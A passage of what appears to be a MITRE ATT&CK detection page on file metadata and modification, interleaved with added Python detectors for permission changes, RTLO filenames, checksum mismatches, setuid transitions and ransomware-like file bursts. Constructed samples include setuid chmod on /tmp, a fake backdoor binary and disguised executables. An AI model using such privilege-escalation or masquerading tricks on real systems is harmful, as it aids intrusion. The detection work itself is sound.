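     "ProcessName": r"C:\Windows\regedit.exe"},                     # registry key, not a file
    {"event_id": 4663, "ObjectType": "File", "SubjectUserSid": "S-1-5-21-1111-2222-3333-1002",
     "SubjectUserName": "bob", "HandleId": "0x3f0", "ObjectName": r"C:\Users\bob\notes.txt",
     "ProcessName": r"C:\Windows\explorer.exe"},                    # access, not a DACL change
]


def file_dacl_events(events):
    """Analytic 1: 4670 on File objects, excluding the local system account."""
    return [e for e in events
            if e["event_id"] == 4670 and e["ObjectType"] == "File"
            and e["SubjectUserSid"] != LOCAL_SYSTEM_SID]


def group_by_handle(events):
    """Collapse the per-child events of one folder change into a single entry
    keyed by (user, HandleId), keeping the modifying process and the objects."""
    groups = defaultdict(lambda: {"process": None, "objects": []})
    for e in file_dacl_events(events):
        g = groups[(e["SubjectUserName"], e["HandleId"])]
        g["process"] = e["ProcessName"]
        g["objects"].append(e["ObjectName"])
    return dict(groups)


# Constructed Linux process records.
SAMPLE_LINUX_PROCS = [
    {"user": "root", "command_line": "chmod 755 /usr/local/bin/tool"},
    {"user": "www-data", "command_line": "chmod u+s /tmp/.x"},
    {"user": "alice", "command_line": "ls -la /etc"},
    {"user": "alice", "command_line": "/bin/chmod -R 777 /srv/app"},
]


def chmod_processes(procs):
    """Analytic 2: processes whose command line starts with chmod. The first
    token is compared by basename so /bin/chmod is caught as well."""
    hits = []
    for p in procs:
        tokens = p["command_line"].split()
        if tokens and tokens[0].rsplit("/", 1)[-1] == "chmod":
            hits.append(p)
    return hits


if __name__ == "__main__":
    for (user, handle), g in group_by_handle(SAMPLE_WIN_EVENTS).items():
        print(user, handle, g["process"], len(g["objects"]), "object(s)")
    for p in chmod_processes(SAMPLE_LINUX_PROCS):
        print(p["user"], p["command_line"])
```

The grouped output is what an analyst wants to triage: one line per user and handle with the process name beside it, so the "uncommon process name" check from the bullet list is a glance rather than a search through hundreds of per-file events. The chmod filter is as coarse as the page's glob; the cron allow-listing the text mentions would be applied to its output.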

.002 Linux and Mac File and Directory Permissions Modification

Monitor and investigate attempts to modify ACLs and file/directory ownership. Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.

Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions.

Windows environment logs can be noisy, so we take the following into consideration:

  • We need to exclude events generated by the local system (subject security ID "NT AUTHORITY\SYSTEM") and focus on actual user events.
  • When a permission modification is made for a folder, a new event log is generated for each subfolder and file under that folder. It is advised to group logs based on handle ID or user ID.
  • The Windows security log (event ID 4670) also includes information about the process that modifies the file permissions. It is advised to focus on uncommon process names, and it is also uncommon for real users to perform this task without a GUI.
  • Pseudocode Event ID is for Windows Security Log (Event ID 4670 - Permissions on an object were changed).
  • Windows Event ID 4719 (An Attempt Was Made to Access An Object) can also be used to alert on changes to Active Directory audit policy for a system.

Linux environment logs can be more noisy than the Windows-specific implementation, although Linux does not generate logs for system triggered activities like in Windows. In addition, it may be necessary to whitelist cron jobs that regularly run and execute chmod.

Analytic 1 : Access Permission Modification for Windows

file_dacl_events = filter log_events where (event_id == "4670" AND object_type == "File" AND subject_security_id != "NT AUTHORITY\SYSTEM")

Analytic 2 - Access Permission Modification for Linux

chmod_processes = filter processes where command_line == "chmod *"

Enterprise T1564 Hide Artifacts

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, or permissions, for signs that an adversary is attempting to hide artifacts associated with their behaviors to evade detection.

.001 Hidden Files and Directories

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, or permissions, for signs that files and directories have been set to hidden to evade detection mechanisms.

.004 NTFS File Attributes

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, or permissions, for signs that NTFS file attributes are being used to hide malicious data in order to evade detection. Forensic techniques exist to identify information stored in NTFS EA.[16]

.007 VBA Stomping

If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.[17]

.009 Resource Forking

Identify files with the com.apple.ResourceFork extended attribute and large data amounts stored in resource forks.

Enterprise T1070 Indicator Removal

Monitor for contextual file data that may show signs of deletion or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

.006 Timestomp

Monitor file modifications with tooling that collects information on file handle opens and can compare timestamp values.

ICS T0872 Indicator Removal on Host

Monitor for contextual file data that may show signs of deletion or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.

Enterprise T1570 Lateral Tool Transfer

Monitor for identical file hashes or characteristics (ex: filename) that are created on multiple hosts.

ICS T0867 Lateral Tool Transfer

Monitor for identical file hashes or characteristics (ex: filename) that are created on multiple hosts.

Enterprise T1036 Masquerading

Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters "\u202E", "[U+202E]", and "%E2%80%AE".

Check and ensure that file headers/signature and extensions match using magic bytes detection and/or file signature validation.[18] In Linux, the file command may be used to check the file signature.[19]
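The checks described in the two paragraphs above, and repeated under the Right-to-Left Override and Space after Filename sub-techniques below, come down to a few string and byte comparisons on each file. The block below is an added Python illustration of them, not MITRE's code: it looks for the right-to-left override in the raw, escaped and URL-encoded forms the page lists, flags a trailing space, compares a file's leading bytes with what its extension promises, and renders names so the override is printed as a visible marker rather than interpreted. The magic-byte table holds only well-known signatures, and all sample names and headers are constructed.

```python
"""Added example: filename and header checks for the masquerading indicators
described above: right-to-left override characters in the raw, escaped and
URL-encoded forms, a trailing space in the name, and an extension that
disagrees with the file's magic bytes. Not MITRE code; samples constructed."""
import os

RTLO_CHAR = "\u202e"
# How the override shows up in raw names, in escaped log text, and URL-encoded.
RTLO_FORMS = (RTLO_CHAR, "\\u202E", "[U+202E]", "%E2%80%AE")

# Extension -> accepted leading bytes (well-known signatures only).
MAGIC = {
    ".exe": (b"MZ",), ".dll": (b"MZ",),
    ".pdf": (b"%PDF",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".zip": (b"PK\x03\x04",), ".docx": (b"PK\x03\x04",),
}


def rtlo_forms_present(name):
    """Which RTLO representations occur in the name as it appears in a log."""
    return [f for f in RTLO_FORMS if f.lower() in name.lower()]


def reveal_rtlo(name):
    """Replace the override with a visible marker so reports print the true name."""
    return name.replace(RTLO_CHAR, "<RTLO>")


def has_trailing_space(name):
    return name != name.rstrip(" ")


def header_matches_extension(name, header):
    """True/False for a known extension, None when the extension is not in MAGIC."""
    ext = os.path.splitext(name.rstrip(" "))[1].lower()
    sigs = MAGIC.get(ext)
    if sigs is None:
        return None
    return any(header.startswith(s) for s in sigs)


def assess(name, header=b""):
    """Collect every indicator for one file; an empty list means nothing found."""
    indicators = []
    if rtlo_forms_present(name):
        indicators.append("rtlo")
    if has_trailing_space(name):
        indicators.append("trailing-space")
    if header and header_matches_extension(name, header) is False:
        indicators.append("extension-magic-mismatch")
    return {"name": reveal_rtlo(name), "indicators": indicators}


# Constructed samples: (name as logged, first bytes of the file)
SAMPLES = [
    ("report\u202efdp.exe", b"MZ\x90\x00"),        # override makes the name render as reportexe.pdf
    ("photo%E2%80%AEgnp.scr", b""),               # override in URL-encoded log text
    ("invoice.pdf", b"MZ\x90\x00"),                # PE header under a .pdf extension
    ("notes.txt ", b"#!/bin/sh\n"),                # trailing space in the name
    ("paper.pdf", b"%PDF-1.7\n"),                  # clean
]

if __name__ == "__main__":
    for name, header in SAMPLES:
        r = assess(name, header)
        print(repr(r["name"]), r["indicators"] or "ok")
```

Reading only the first 8 bytes is enough for every entry in the table, so the header check can run on every file-creation event without reading whole files; an extension outside the table returns None rather than a verdict, which keeps unknown types from being reported as mismatches.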

.001 Invalid Code Signature

Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment, look for invalid signatures as well as unusual certificate characteristics and outliers.

.002 Right-to-Left Override

Monitor for common formats of RTLO characters within filenames such as \u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools to ensure they do not interpret the RTLO character and instead print the true name of the file containing it.

.003 Rename System Utilities

Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity.

.005 Match Legitimate Name or Location

Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.

.006 Space after Filename

Monitor for spaces at the end of file names, that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.

.007 Double File Extension

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

ICS T0849 Masquerading

Collect file hashes. Monitor for file names that do not match their expected hash. Perform file monitoring. Files with known names but in unusual locations are suspect. Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters "\u202E", "[U+202E]", and "%E2%80%AE". For added context on adversary procedures and background see Masquerading and applicable sub-techniques.

Enterprise T1027 Obfuscated Files or Information

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

File-based signatures may be capable of detecting code obfuscation depending on the methods used.[20][21][22]

.001 Binary Padding

Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool. When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file.

.002 Software Packing

Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.

.003 Steganography

Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.

.004 Compile After Delivery

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

.007 Dynamic API Resolution

Depending on the method used to obfuscate API function calls, a file-based signature may be capable of detecting dynamic resolution.[20][21][22]

.008 Stripped Payloads

Detecting the presence of stripped payloads may be difficult and unwarranted in real-time, though analyzing contextual data about files (such as content and character entropy) may highlight attempts at obfuscation.

.009 Embedded Payloads

Monitor contextual data about a file that may highlight embedded payloads, which may include information such as name, the content (ex: signature, headers, or data/media), file size, etc.; correlate with other suspicious behavior to reduce false positives.

.010 Command Obfuscation

Scripts containing obfuscated content may have higher entropy of characters/strings.

.012 LNK Icon Smuggling

Monitor contextual data about a file that may highlight embedded malicious content, which may include information such as name, the content (ex: signature, headers, or data/media), file size, etc.; correlate with other suspicious behavior to reduce false positives.

Enterprise T1055 Process Injection

Monitor for contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc.

.013 Process Doppelgänging

Scan file objects reported during the PsSetCreateProcessNotifyRoutine, [23] which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. [24] Also consider comparing file objects loaded in memory to the corresponding file on disk. [25]

Enterprise T1553 Subvert Trust Controls

Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.

.001 Gatekeeper Bypass

Review false values under the LSFileQuarantineEnabled entry in an application's Info.plist file (required by every application). false under LSFileQuarantineEnabled indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified LSFileQuarantineEnabled entry will default to not setting the quarantine flag.

QuarantineEvents is a SQLite database containing a list of all files assigned the com.apple.quarantine attribute, located at ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed. [26]

.002 Code Signing

Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.

.005 Mark-of-the-Web Bypass

Monitor files (especially those downloaded from untrusted locations) for MOTW attributes. Also consider inspecting and scanning file formats commonly abused to bypass MOTW (ex: .arj, .gzip, .iso, .vhd).

Enterprise T1195 Supply Chain Compromise

Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.

.001 Compromise Software Dependencies and Development Tools

Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.

.002 Compromise Software Supply Chain

Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity.

ICS T0862 Supply Chain Compromise

Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures.
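The hash-checking step in the rows above is the same whether the artifact is a package download or a vendor OS image. The following is an added example (not code from the ATT&CK page or any vendor) that parses the two common manifest layouts, picks the algorithm from the digest length, compares in constant time, and reports weak (md5/sha1), missing and mismatched entries. The files and manifest are constructed; a real manifest must itself arrive over a trusted channel (a signed release page or a detached signature), otherwise a matching hash proves nothing.

```python
"""Verify downloaded binaries against a checksum manifest (added example)."""
import hashlib
import hmac
import re

# GNU coreutils style: "<hex>  <name>" (two spaces, or " *" for binary mode)
GNU_LINE = re.compile(r"^([0-9a-fA-F]+)\s+\*?(.+?)\s*$")
# BSD style: "SHA256 (name) = <hex>"
BSD_LINE = re.compile(r"^(\w+)\s+\((.+)\)\s*=\s*([0-9a-fA-F]+)\s*$")

# Algorithm inferred from hex digest length; md5/sha1 are kept only to be flagged.
BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}
WEAK = {"md5", "sha1"}


def parse_manifest(text):
    """Yield (name, algorithm, hex_digest) for every parseable line."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = BSD_LINE.match(line)
        if m:
            yield m.group(2), m.group(1).lower(), m.group(3).lower()
            continue
        m = GNU_LINE.match(line)
        if m and len(m.group(1)) in BY_LENGTH:
            yield m.group(2), BY_LENGTH[len(m.group(1))], m.group(1).lower()


def verify_manifest(manifest_text, read_file):
    """read_file(name) -> bytes, raising FileNotFoundError when absent.
    Returns {name: status}, status in ok / mismatch / missing / weak / unknown."""
    results = {}
    for name, algo, expected in parse_manifest(manifest_text):
        if algo in WEAK:
            results[name] = "weak"          # an md5/sha1 manifest is not evidence
            continue
        if algo not in hashlib.algorithms_available:
            results[name] = "unknown"
            continue
        try:
            data = read_file(name)
        except FileNotFoundError:
            results[name] = "missing"
            continue
        actual = hashlib.new(algo, data).hexdigest()
        results[name] = "ok" if hmac.compare_digest(actual, expected) else "mismatch"
    return results


# Constructed download set: one genuine file, one swapped file, one never fetched.
SAMPLE_FILES = {
    "agent-1.2.3.tar.gz": b"pretend this is the real tarball",
    "agent-1.2.3.msi": b"pretend this MSI was swapped by an attacker",
}
SAMPLE_MANIFEST = "\n".join([
    hashlib.sha256(SAMPLE_FILES["agent-1.2.3.tar.gz"]).hexdigest() + "  agent-1.2.3.tar.gz",
    "SHA512 (agent-1.2.3.msi) = " + hashlib.sha512(b"the vendor's genuine MSI").hexdigest(),
    hashlib.sha256(b"never downloaded").hexdigest() + "  agent-1.2.3.deb",
    hashlib.md5(b"legacy entry").hexdigest() + "  agent-legacy.zip",
])


def read_sample(name):
    """Stand-in for open(name, 'rb').read() over the constructed files."""
    try:
        return SAMPLE_FILES[name]
    except KeyError:
        raise FileNotFoundError(name)
```

For real downloads pass `lambda n: open(n, "rb").read()` as `read_file`; the same call verifies a network device image copied to a trusted workstation against the vendor's published digest.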

Enterprise T1218 .011 System Binary Proxy Execution: Rundll32

Analyze contextual data about executed DLL files, which may include information such as name, the content (ex: signature, headers, or data/media), age, user/owner, permissions, etc.

File: File Modification

Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2)

Domain ID Name Detects
Enterprise T1548 Abuse Elevation Control Mechanism

On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file. Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called.

.001 Setuid and Setgid

Monitor for changes made to files that may perform shell escapes or exploit vulnerabilities in an application with the setuid or setgid bits to get code running in a different user's context.

.003 Sudo and Sudo Caching

On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.
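The auditd rule and the sudo I/O logging named above, with detection logic over the resulting records, as an added example (not code from the ATT&CK page). A rule for /etc/audit/rules.d that records execve calls whose real and effective UIDs differ is `-a always,exit -F arch=b64 -S execve -C uid!=euid -F euid=0 -k setuid_exec`, and sudo session recording is turned on in /etc/sudoers with `Defaults log_input, log_output`. The records below are constructed and the allowlist of expected setuid helpers is an assumption to tune per host.

```python
"""Flag real-UID / effective-UID transitions in auditd SYSCALL records
(added example; records constructed, allowlist assumed)."""
import re

# key=value tokens; values are either "quoted" or bare
TOKEN = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
UNSET_AUID = "4294967295"          # auditd writes an unset login UID as unsigned -1
EXPECTED_SETUID = frozenset({"/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd",
                             "/usr/bin/pkexec", "/usr/bin/newgrp"})


def parse_record(line):
    fields = {}
    for key, val in TOKEN.findall(line):
        if len(val) >= 2 and val[0] == '"' and val[-1] == '"':
            val = val[1:-1]
        fields[key] = val
    return fields


def uid_transitions(lines, expected=EXPECTED_SETUID):
    """SYSCALL records whose uid differs from euid, tagged 'expected' when the
    binary is a known setuid helper and 'unexpected' otherwise. Records with an
    unset login UID (daemons started by init) are skipped."""
    hits = []
    for line in lines:
        rec = parse_record(line)
        if rec.get("type") != "SYSCALL":
            continue
        uid, euid = rec.get("uid"), rec.get("euid")
        if uid is None or euid is None or uid == euid:
            continue
        if rec.get("auid", UNSET_AUID) == UNSET_AUID:
            continue
        exe = rec.get("exe", "")
        hits.append({
            "serial": rec.get("msg", ""),
            "auid": rec["auid"], "uid": uid, "euid": euid,
            "exe": exe, "comm": rec.get("comm", ""),
            "verdict": "expected" if exe in expected else "unexpected",
        })
    return hits


# Constructed /var/log/audit/audit.log excerpt: sudo, an ordinary execve, a
# setuid-root binary dropped in /tmp, and a daemon with no login UID.
SAMPLE_AUDIT = [
    'type=SYSCALL msg=audit(1700000000.101:501): arch=c000003e syscall=59 success=yes exit=0 '
    'ppid=4101 pid=4102 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 '
    'tty=pts0 ses=3 comm="sudo" exe="/usr/bin/sudo" key="setuid_exec"',
    'type=PATH msg=audit(1700000000.101:501): item=0 name="/usr/bin/sudo" inode=12345 mode=0104755',
    'type=SYSCALL msg=audit(1700000000.250:502): arch=c000003e syscall=59 success=yes exit=0 '
    'ppid=4102 pid=4110 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 '
    'tty=pts0 ses=3 comm="ls" exe="/usr/bin/ls" key="setuid_exec"',
    'type=SYSCALL msg=audit(1700000000.900:503): arch=c000003e syscall=59 success=yes exit=0 '
    'ppid=4110 pid=4120 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 '
    'tty=pts0 ses=3 comm="backdoor" exe="/tmp/.x/backdoor" key="setuid_exec"',
    'type=SYSCALL msg=audit(1700000001.000:504): arch=c000003e syscall=59 success=yes exit=0 '
    'ppid=1 pid=900 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 '
    'tty=(none) ses=4294967295 comm="cron" exe="/usr/sbin/cron" key="setuid_exec"',
]
```

Feed `uid_transitions` the lines of `ausearch -k setuid_exec --raw`; the `unexpected` verdicts are the ones worth pairing with the sudo I/O logs under /var/log/sudo-io.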

Enterprise T1098 Account Manipulation

Monitor for changes made to files related to account settings, such as /etc/ssh/sshd_config and the authorized_keys file for each user on a system.

.004 SSH Authorized Keys

Monitor for changes made to the authorized_keys file for each user on a system. Monitor for changes to, and suspicious processes modifying, /etc/ssh/sshd_config.

Enterprise T1547 Boot or Logon Autostart Execution

Monitor for changes made to files that may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems.

.001 Registry Run Keys / Startup Folder

Monitor the startup folders for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including the startup folders. [27]

.006 Kernel Modules and Extensions

Monitor for changes made to files that may modify the kernel to automatically execute programs on system boot.

.007 Re-opened Applications

Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.

.008 LSASS Driver

Monitor for changes made to files that may modify or add LSASS drivers to obtain persistence on compromised systems.

.009 Shortcut Modification

Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.

.013 XDG Autostart Entries

Malicious XDG autostart entries may be detected by auditing file modification events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.

.015 Login Items

All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.[9][10][11][12] These locations should be monitored and audited.

Enterprise T1037 Boot or Logon Initialization Scripts

Monitor for changes made to files that are modified by unusual accounts outside of normal administration duties.

.002 Login Hook

Monitor for changes to login hook files (/Library/Preferences/com.apple.loginwindow.plist), especially by unusual accounts outside of normal administration duties.

.003 Network Logon Script

Monitor for unexpected modifications to logon script files made by unusual accounts outside of normal administration duties.

.004 RC Scripts

Monitor for unexpected modifications to RC scripts in the /etc/ directory.

.005 Startup Items

Monitor for unexpected modifications to the /Library/StartupItems folder.

Enterprise T1554 Compromise Client Software Binary

Monitor changes to client software that do not correlate with known software or patch cycles.

Enterprise T1543 Create or Modify System Process

Monitor for changes to files associated with system-level processes.

.001 Launch Agent

Launch Agents also require files on disk for persistence which can also be monitored via other file monitoring applications.

.002 Systemd Service

Systemd service unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/<username>/.config/systemd/user/ directories, as well as associated symbolic links.

.004 Launch Daemon

Monitor files for changes that may create or modify Launch Daemons to execute malicious payloads as part of persistence.

Enterprise T1485 Data Destruction

Monitor for changes made to a large quantity of files for unexpected modifications in user directories and under C:\Windows\System32.

ICS T0809 Data Destruction

Monitor for changes made to a large quantity of files for unexpected modifications in both user directories and directories used to store programs and OS components (e.g., C:\Windows\System32).

Enterprise T1486 Data Encrypted for Impact

Monitor for changes made to files in user directories.
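The three rows above all reduce to one signal: a single process touching a large number of files in user or system directories within a short window, with the encryption case additionally rewriting each file under a new extension. The following is an added example (not code from the ATT&CK page) of a per-process sliding-window burst detector fed with (timestamp, process, path, old_path) tuples such as Sysmon EID 2/11 or an EDR file stream would yield. The events are constructed and the thresholds are assumptions to tune to the host's normal volume.

```python
"""Mass file modification / encryption burst detector (added example)."""
from collections import defaultdict, deque
import os

WATCHED_PREFIXES = ("c:\\users\\", "c:\\windows\\system32\\", "\\home\\", "\\root\\")
WINDOW_SECONDS = 60
MAX_FILES_PER_WINDOW = 50      # distinct files one process may touch per window
RENAME_RATIO = 0.5             # share of writes that changed the extension


def in_watched_dirs(path):
    p = path.lower().replace("/", "\\")
    return p.startswith(WATCHED_PREFIXES)


class BurstDetector:
    def __init__(self, window=WINDOW_SECONDS, max_files=MAX_FILES_PER_WINDOW, ratio=RENAME_RATIO):
        self.window, self.max_files, self.ratio = window, max_files, ratio
        self.events = defaultdict(deque)       # process -> (ts, path, ext_changed)
        self.alerted = set()

    def feed(self, ts, process, path, old_path=None):
        """old_path is set for rename events; returns an alert dict or None."""
        if not in_watched_dirs(path):
            return None
        q = self.events[process]
        ext_changed = bool(old_path) and (
            os.path.splitext(old_path)[1].lower() != os.path.splitext(path)[1].lower())
        q.append((ts, path, ext_changed))
        while q and ts - q[0][0] > self.window:
            q.popleft()
        distinct = {p for _, p, _ in q}
        if len(distinct) < self.max_files or process in self.alerted:
            return None
        self.alerted.add(process)
        renamed = sum(1 for _, _, changed in q if changed)
        return {"process": process, "files": len(distinct), "window_s": self.window,
                "extension_changes": renamed,
                "pattern": "encrypt/rename" if renamed / len(q) >= self.ratio else "overwrite/delete"}


def run_sample():
    """Constructed stream: a ransomware-like process, a noisy process outside the
    watched trees, and an editor at normal volume."""
    det, alerts = BurstDetector(), []

    def push(*args, **kw):
        a = det.feed(*args, **kw)
        if a:
            alerts.append(a)

    for i in range(60):
        old = "C:\\Users\\bob\\Documents\\doc%03d.docx" % i
        push(1000 + i * 0.5, "evil.exe", old + ".locked", old_path=old)
    for i in range(100):
        push(1000 + i * 0.5, "svchost.exe", "C:\\Windows\\Temp\\x%d.tmp" % i)
    for i in range(20):
        push(1000 + i * 2.0, "WINWORD.EXE", "C:\\Users\\bob\\Documents\\doc%03d.docx" % i)
    return alerts
```

The detector fires once per process; a real deployment would also key on the user session and reset after a configurable cool-down.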

Enterprise T1565 Data Manipulation

Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity

.001 Stored Data Manipulation

Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity

.003 Runtime Data Manipulation

Monitor for unexpected files with manipulated data in order to manipulate external outcomes or hide activity

Enterprise T1491 Defacement

Monitor for changes made to files for unexpected modifications to internal and external websites for unplanned content changes.

.001 Internal Defacement

Monitor internal websites for unplanned content changes.

.002 External Defacement

Monitor external websites for unplanned content changes.

Enterprise T1140 Deobfuscate/Decode Files or Information

Monitor for changes made to files for unexpected modifications that attempt to hide artifacts. On Windows, Event ID 4663 (Security Log - An attempt was made to access an object) can be used to alert on suspicious file accesses (e.g., attempting to write to a file which shouldn’t be further modified) that may coincide with attempts to hide artifacts.

Enterprise T1546 Event Triggered Execution

Monitor for changes made to files that may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events.

.002 Screensaver

Monitor for changes made to files that may establish persistence by executing malicious content triggered by user inactivity.

Note: Although there are no standard events for file modification, Windows Event ID 4663 (An Attempt Was Made to Access An Object) can be used to alert on attempted accesses of screensaver files (typically ending in a file extension of .scr).

.004 Unix Shell Configuration Modification

Monitor for changes to /etc/profile and /etc/profile.d; these files should only be modified by system administrators. macOS users can leverage Endpoint Security Framework file events to monitor these specific files.[28]

.005 Trap

Monitor for changes made to files that may establish persistence by executing malicious content triggered by an interrupt signal.

.006 LC_LOAD_DYLIB Addition

Monitor file systems for changes to application binaries and invalid checksums/signatures.

.008 Accessibility Features

Monitor for changes made to files that may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious.

.011 Application Shimming

Monitor for changes made to files that may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.

.013 PowerShell Profile

Locations where profile.ps1 can be stored should be monitored for modifications. [13] Example profile locations include:

* $PsHome\Profile.ps1
* $PsHome\Microsoft.{HostProgram}_profile.ps1
* $Home\My Documents\PowerShell\Profile.ps1
* $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1

.014 Emond

Monitor emond rules creation by checking for files modified in /etc/emond.d/rules/ and /private/var/db/emondClients.

Enterprise T1187 Forced Authentication

Monitor for changes made to .LNK, .SCF, or any other files on systems and within virtual environments that contain resources pointing to external network resources.

Enterprise T1564 Hide Artifacts

Monitor for changes made to files that may attempt to hide artifacts associated with their behaviors to evade detection.

.002 Hidden Users

Monitor for changes made to files that may use hidden users to mask the presence of user accounts they create or modify. Monitor for changes made to the /Library/Preferences/com.apple.loginwindow plist file for unexpected modifications to the Hide500Users key value on macOS.[29]

.003 Hidden Window

Monitor for changes made to files that may use hidden windows to conceal malicious activity from the plain sight of users. On macOS, XML-format plist files are text with a fixed structure, so they are easy to parse; binary plists can be converted with plutil -convert xml1 (or printed with plutil -p). File monitoring can check for the apple.awt.UIElement or LSUIElement keys, or any other suspicious plist key, and flag them.

.004 NTFS File Attributes

There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. [30] [31] [32] For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
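The colon heuristic above needs one refinement in practice: every absolute Windows path contains a colon after the drive letter, and the one stream that is expected on a downloaded file is Zone.Identifier, which is where the Mark-of-the-Web from the .005 row lives. The following is an added example (not code from the ATT&CK page) that recognises `path:stream[:$type]` syntax without matching `C:\`, classifies the stream, parses a Zone.Identifier stream, and flags internet-sourced container formats whose contents will not carry the mark. Sample inputs are constructed and the container list is an assumption.

```python
"""ADS syntax detection and Mark-of-the-Web parsing (added example)."""
import configparser
import os
import re

# <path>:<stream>[:$<type>] where <path> may start with a drive letter
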